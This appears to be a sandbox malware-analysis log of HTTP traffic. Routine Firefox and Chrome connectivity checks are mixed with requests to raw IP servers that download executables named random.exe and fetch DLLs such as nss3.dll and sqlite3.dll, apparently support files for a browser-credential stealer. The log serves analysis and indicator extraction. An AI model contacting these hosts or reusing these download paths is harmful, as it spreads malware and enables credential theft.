Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /files/6530775752/PK13K1G.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/encoxx/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /files/hell911/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/hell911/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /files/hell911/random.exe HTTP/1.1Host: 31.41.244.11If-Modified-Since: Thu, 12 Dec 2024 23:33:40 GMTIf-None-Match: "675b72d4-289a00"
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Sat, 14 Dec 2024 10:55:25 GMTIf-None-Match: "675d641d-ece00"
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Sat, 14 Dec 2024 10:56:44 GMTIf-None-Match: "675d646c-1b9000"
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Sat, 14 Dec 2024 10:55:53 GMTIf-None-Match: "675d6439-2aa400"
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
